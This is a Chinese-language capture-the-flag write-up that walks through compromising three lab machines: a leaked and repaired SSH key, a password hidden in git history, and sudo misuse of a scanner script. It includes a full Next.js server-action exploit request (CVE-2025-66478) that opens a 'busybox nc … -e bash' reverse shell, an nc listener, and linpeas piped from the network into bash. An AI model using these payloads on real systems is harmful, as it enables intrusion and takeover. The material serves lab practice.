www-data@Lzh:/var/www/html/mozilo/admin$ grep -rin "welcome" --include="*.php" ./
<ilo/admin$ grep -rin "welcome" --include="*.php" ./
./config.php:107:    // welcome:3e73d572ba005bb3c02107b2e2fc16f8

成功连接

root

sudo和find / -perm /4000 -type f -exec ls -ld {} \; 2>/dev/null 发现没有sudo

welcome@Lzh:~$ ls -al
total 28
drwx------ 2 welcome welcome 4096 Apr 12  2025 .
drwxr-xr-x 3 root    root    4096 Apr 11  2025 ..
lrwxrwxrwx 1 root    root       9 Apr 11  2025 .bash_history -> /dev/null
-rw-r--r-- 1 welcome welcome  220 Apr 11  2025 .bash_logout
-rw-r--r-- 1 welcome welcome 3526 Apr 11  2025 .bashrc
-rw-r--r-- 1 root    root    2590 Apr 12  2025 id_rsa
-rw-r--r-- 1 welcome welcome  807 Apr 11  2025 .profile
-rw-r--r-- 1 welcome welcome   44 Apr 12  2025 user.txt
lrwxrwxrwx 1 root    root       9 Apr 12  2025 .viminfo -> /dev/null

发现存在一个rsa文件，直接去连接

welcome@Lzh:~$ ssh -i id_rsa root@localhost
The authenticity of host 'localhost (::1)' can't be established.
ECDSA key fingerprint is SHA256:IV6iZTL6D//1Ojh0d8XoSMepPgjyUfV/FpQmf3q35Hg.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'localhost' (ECDSA) to the list of known hosts.
Load key "id_rsa": invalid format
格式错误

welcome@Lzh:~$ cat id*
-----BEGIN OPENSSH PRIVATE KEY-----
???lbnNz

发现前三位是？，简单信息搜集一下，问ai要可以出来，发现前三位是b3B，然后把他cp到/tmp里面，然后添加600权限，vim改下

然后去本地测试连接ssh -i /tmp/id_rsa root@localhost

拿下root

welcome@Lzh:/tmp$ ssh root@localhost -i /tmp/id_rsa
Linux Lzh 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sat Apr 12 23:17:27 2025 from 192.168.3.94
root@Lzh:~# id
uid=0(root) gid=0(root) groups=0(root)

7r1umph

打开靶机，依然三件套nmap,dirsearch,dir扫描

发现

[19:02:30] 200 -  841B  - /index.php                                        
[19:02:30] 200 -  841B  - /index.php/login/                                 
[19:02:30] 200 -   23KB - /info.php                                         
[19:02:36] 403 -  278B  - /server-status                                    
[19:02:36] 403 -  278B  - /server-status/                                   
[19:02:38] 301 -  312B  - /tmp  ->  http://10.247.102.33/tmp/               
[19:02:38] 200 -  403B  - /tmp/                                             
[19:02:38] 301 -  315B  - /upload  ->  http://10.247.102.33/upload/         
[19:02:38] 200 -  405B  - /upload/                                          

发现文件上传点，也会出现在/tmp上,但是再点击的时候，就显示404，该文件也消失掉了

但是传上去文件后缀自动添加dsz，那应该就是利用条件竞争去写入恶意代码

7r1umph 靶机渗透测试报告 (Write-up)

参考上面文章，通过其去反弹shell

└─# nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.247.102.219] from (UNKNOWN) [10.247.102.33] 47452

user

www-data@7r1umph:/home$ find / -type f -perm -4000 2>/dev/null
find / -type f -perm -4000 2>/dev/null
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/mount
/usr/bin/su
/usr/bin/umount
/usr/bin/pkexec
/usr/bin/sudo
/usr/bin/passwd
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/libexec/polkit-agent-helper-1

没有什么东西

www-data@7r1umph:/home$ cd /opt
cd /opt
www-data@7r1umph:/opt$ ls -al
ls -al
total 56
drwxr-xr-x  2 root root  4096 Apr 12  2025 .
drwxr-xr-x 18 root root  4096 Mar 18  2025 ..
-rw-r--r--  1 root root 16968 Apr 12  2025 guess
-rw-r--r--  1 root root 27871 Apr 12  2025 yeyeye.png

去查看，发现一个图片，

www-data@7r1umph:/opt$ base64 /opt/yeyeye.png base加密然后去随波逐流去生成图片

Dorabella Cipher

解密出来是

yecongdong

尝试ssh连接成功进入

$ python3 -c 'import pty; pty.spawn("/bin/bash")'
welcome@7r1umph:~$ 

root

welcome@7r1umph:~$ ls
RegView  user.txt
welcome@7r1umph:~$ cd Re*
welcome@7r1umph:~/RegView$ ls
poc.txt  README.md  RegView.sh  run.jpg  source.txt
welcome@7r1umph:~/RegView$ ll
bash: ll: command not found
welcome@7r1umph:~/RegView$ ls -al
total 476
drwxr-xr-x 3 root    root      4096 Apr 12  2025 .
drwx------ 3 welcome welcome   4096 Apr 12  2025 ..
drwxr-xr-x 8 root    root      4096 Apr 12  2025 .git
-rw-r--r-- 1 root    root       289 Dec  3  2024 poc.txt
-rw-r--r-- 1 root    root       936 Apr 12  2025 README.md
-rwxr-xr-x 1 root    root      3911 Apr 12  2025 RegView.sh
-rw-r--r-- 1 root    root    457296 Dec  3  2024 run.jpg
-rw-r--r-- 1 root    root      2095 Dec  3  2024 source.txt
welcome@7r1umph:~/RegView$ 

发现.git文件

git log 查看一下git的日志

commit acd806aad21acb61112252234c7707bc8a74dd3c (HEAD -> main)
Author: bamuwe <bamuwe@qq.com>
Date:   Sat Apr 12 01:33:50 2025 -0400

    fix bug

commit 900b75c25c03c4af30d8d05de61c01c723741ecc
Author: bamuwe <bamuwe@qq.com>
Date:   Sat Apr 12 01:32:22 2025 -0400

    add source2.txt

发现source2.txt文件
git show  900b75c:source2.txt
root:ff855ad811c79e5fba458a575fac5b83
welcome@7r1umph:~/RegView$ su root
Password: 
root@7r1umph:/home/welcome/RegView# 
拿下root

React

user

反应，打开nmap，dirsearch,gobuster扫一下，出来80 22 3000端口

刚开始没太管这3000端口，去打80端口的了，感觉是rce没有出来，问的其他cyl才发现3000端口有漏洞并且是之前CVE-2025-66478

POST / HTTP/1.1
Host: 10.247.102.188:3000
Next-Action: x
Content-Type: multipart/form-data; boundary=----Boundary
Content-Length: 641

------Boundary
Content-Disposition: form-data; name="0"

{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B1337\"}","_response":{"_prefix":"var res=encodeURIComponent(process.mainModule.require('child_process').execSync('busybox nc 10.247.102.219 4444 -e bash').toString().trim());;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});","_chunks":"$Q2","_formData":{"get":"$1:constructor:constructor"}}}
------Boundary
Content-Disposition: form-data; name="1"

"$@0"
------Boundary
Content-Disposition: form-data; name="2"

[]
------Boundary--

成功反弹

curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | bash 看一下，没有什么东西
不过出来bot用户密码了lMmqr98vg3Ke1Mu4hJwN

登录一下

root

查看的群友的wp，前来复现

sudo -l一下
bot@React:~$ sudo -l
Matching Defaults entries for bot on React:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User bot may run the following commands on React:
    (ALL) NOPASSWD: /opt/react2shell/scanner.py
    (ALL) NOPASSWD: /usr/bin/rm -rf /
bot@React:~$ 

bot@React:~$ head /opt/react2shell/scanner.py
#!/usr/bin/python3
import argparse
import sys
import json
import os
import random
import re
import string
from datetime import datetime, timezone
from concurrent.futures import ThreadPoolExecutor, as_completed
查看一下这个脚本的头部信息

bot@React:~$ sudo /opt/react2shell/scanner.py
usage: scanner.py [-h] (-u URL | -l LIST) [-t THREADS] [--timeout TIMEOUT]
                  [-o OUTPUT] [--all-results] [-k] [-H HEADER] [-v] [-q]
                  [--no-color] [--safe-check] [--windows] [--waf-bypass]
                  [--waf-bypass-size KB]
scanner.py: error: one of the arguments -u/--url -l/--list is required
查看一下有什么信息

curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | bash

扫描一些，发现的二进制文件/usr/bin/check_key

查看一些里面的东西
bot@React:/tmp$ /usr/bin/check_key --help
bot@React:/tmp$ /usr/bin/check_key -help
bot@React:/tmp$ strings /usr/bin/check_key
/lib64/ld-linux-x86-64.so.2
fopen
fgets
strlen
fclose
system
__cxa_finalize
strcmp
__libc_start_main
libc.so.6
GLIBC_2.2.5
_ITM_deregisterTMCloneTable
__gmon_start__
_ITM_registerTMCloneTable
u/UH
[]A\A]A^A_
/opt/key
cp /root/Reactrootpass.txt /opt
;*3$"
GCC: (Debian 10.2.1-6) 10.2.1 20210110
crtstuff.c
deregister_tm_clones
__do_global_dtors_aux
completed.0
__do_global_dtors_aux_fini_array_entry
frame_dummy
__frame_dummy_init_array_entry
check_key.c
__FRAME_END__
__init_array_end
_DYNAMIC
__init_array_start
__GNU_EH_FRAME_HDR
_GLOBAL_OFFSET_TABLE_
__libc_csu_fini
_ITM_deregisterTMCloneTable
_edata
fclose@GLIBC_2.2.5
strlen@GLIBC_2.2.5
system@GLIBC_2.2.5
__libc_start_main@GLIBC_2.2.5
fgets@GLIBC_2.2.5
__data_start
strcmp@GLIBC_2.2.5
__gmon_start__
__dso_handle
_IO_stdin_used
__libc_csu_init
__bss_start
main
fopen@GLIBC_2.2.5
__TMC_END__
_ITM_registerTMCloneTable
__cxa_finalize@GLIBC_2.2.5
.symtab
.strtab
.shstrtab
.interp
.note.gnu.build-id
.note.ABI-tag
.gnu.hash
.dynsym
.dynstr
.gnu.version
.gnu.version_r
.rela.dyn
.rela.plt
.init
.plt.got
.text
.fini
.rodata
.eh_frame_hdr
.eh_frame
.init_array
.fini_array
.dynamic
.got.plt
.data
.bss
.comment

发现cp /root/Reactrootpass.txt /opt

直接去读
bot@React:/tmp$ sudo /opt/react2shell/scanner.py -l /root/Reactrootpass.txt
​
brought to you by assetnote
​
[*] Loaded 1 host(s) to scan
[*] Using 10 thread(s)
[*] Timeout: 10s
[*] Using RCE PoC check
[!] SSL verification disabled
​
[ERROR] To75CuOTHLA7BMmH5Puv
拿下密码